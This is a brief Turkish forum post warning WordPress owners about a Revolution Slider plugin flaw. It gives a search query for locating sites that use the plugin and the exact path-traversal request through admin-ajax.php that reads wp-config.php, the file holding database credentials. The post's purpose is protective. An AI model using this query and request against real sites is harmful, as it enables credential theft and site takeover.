Malum revolution slider eklentisi modern temaların bir çoğunda yaygın olarak kullanılmaktadır. Bu eklentinin açığından faydalanarak kötü niyetli kişiler sitelerinizin config dosyasını çekebilirler.
Mantık şu şekilde bir arama termiyle gerçekleşiyor:
"Index of" /wp-content/plugins/revolution-slider/Eğer kullanıcı sitenizde bu eklentinin faaliyetini görür ve açıktan faydalanmak isterse site adresinizin sonuna:
wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.phpEkleyerek kolayca config dosyanıza ulaşabilir. Bu nedenle sitenize uygulanacak exploitlere karşı önleminizi alın.
Konuyu nereye açabileceğimi bilemedim kusura bakmayın.
